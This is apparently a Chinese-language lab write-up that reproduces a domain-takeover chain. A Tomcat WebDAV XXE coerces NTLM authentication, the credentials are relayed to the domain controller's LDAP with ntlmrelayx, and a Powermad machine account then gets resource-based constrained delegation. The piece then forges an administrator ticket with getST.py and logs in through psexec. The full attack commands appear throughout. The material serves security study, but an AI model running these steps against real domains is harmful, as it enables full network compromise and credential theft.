环境

1. 域控DC 10.0.0.16
2. 目标机器win2012r2 10.0.0.12
3. 攻击机mac 10.0.0.2
4. 域内账号hack

tomcat5自带了webdav，将搭建在win2012r2目标机器上。配置好环境变量之后，通过以system权限启动tomcat。

复现

访问http://10.0.0.12:8080/webdav

利用options请求探测可使用的请求方式

在一个国外安全研究员的PPT(链接已死)中提到： 一般webdav支持多种http方法，而PROPPATCH、PROPFIND、 LOCK等方法接受XML作为输入时会形成xxe。

说到xxe一般会想到任意文件读取、内网探测等。玄武实验室文章《Ghidra 从 XXE 到 RCE》中提到利用java xxe做ntlm relay操作。由于sun.net.www.protocol.http.HttpURLConnection 发送HTTP请求时返回为401的HTTP返回头时，会判断该页面要求使用哪种认证方式，若攻击者回复要求采用NTLM认证则会自动使用当前用户凭据进行认证。

NTLMrelay

我记得前两天还有朋友(点名rookie)说不懂内网，比如relay这里解释一下。在个人理解里relay其实就是中间人攻击，我们让clientA对我们伪造的服务端hackerA发起ntlm认证，hackerA再把这个请求转发给域控制器。这个过程就是relay，知道ntlm认证协议的兄弟萌就知道这里可以干很多事，比如relay回本机或者撞hash（不太实际），获取白银黄金票据。只是它与什么dns欺骗和arp欺骗相反，他是主动的。

增加一个服务账号

有人会问：前面都说了relay回自身就可以拿到shell了为什么要增加服务账号？因为这个模拟环境是用system启动的服务，而system relay是用自身的机器账号去做的，没有办法去调高权限RPC接口。

在基于资源的约束委派又需要一个spn账号来配合（ps：因为kerberos的扩展协议s4u2self协议需要spn）。为什么不用前面system账户请求是机器账户 这里的机器账户去委派？因为需要用到密码。

利用获取到的hack账户使用powermad添加一个机器账户evil

Import-Module .\Powermad.ps1
New-MachineAccount -MachineAccount evil1 -Domain pentest.com -DomainController PENTEST-DC.pentest.com

基于资源的约束委派

为了使用户/资源更加独立，Windows Server 2012中引入了基于资源的约束委派。基于资源的约束委派允许资源配置受信任的帐户委派给他们。基于资源的约束委派将委派的控制权交给拥有被访问资源的管理员。也就是说：我们只要通过设置基于资源的约束委派，就可以用那个用户去模拟任意用户去访问拥有委派的权限机器（只对该机器有效）

开启监听

sudo python3 ntlmrelayx.py -t ldap://10.0.0.16 -debug -ip 10.0.0.2 --delegate-access --escalate-user evil1$

然后用xxe请求我们的VPS，接着将凭据中继到域控服务器的LDAP服务上设置基于资源约束委派。

接下来就用设置了基于资源委派的账号去创建伪造一张目标机器administrator账号的票据

python3 getST.py -dc-ip 10.0.0.16 pentest/evil1\$:weareanonymous13 -spn cifs/win2012.pentest.com -impersonate administrator

申请成功，导入票据

export KRB5CCNAME=administrator.ccache

不用那么花里胡哨按格式来登录目标机器就行

python3 psexec.py -k pentest.com/[email protected] -no-pass

可以看到三种登录方式，实战选择system权限的好抓密码。